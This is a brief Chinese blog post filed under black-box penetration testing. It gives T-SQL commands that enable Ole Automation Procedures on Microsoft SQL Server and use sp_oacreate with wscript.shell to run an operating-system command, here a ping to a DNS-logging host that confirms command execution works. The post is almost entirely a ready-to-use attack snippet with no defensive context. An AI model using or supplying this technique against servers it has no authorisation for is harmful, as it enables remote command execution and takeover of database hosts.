mssql试探执行命令
2022-6-16 0:47 作者:酷帥王子 | 黑盒网络渗透测试 |
exec master.dbo.sp_configure 'show advanced options', 1
RECONFIGURE
exec master.dbo.sp_configure 'Ole Automation Procedures', 1
RECONFIGURE
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\windows\system32\ping dnslog'
文章作者:酷帥王子
文章地址:https://www.2k8.org:443/post-370.html
版权所有 © 转载时必须以链接形式注明作者和原始出处!
发表评论: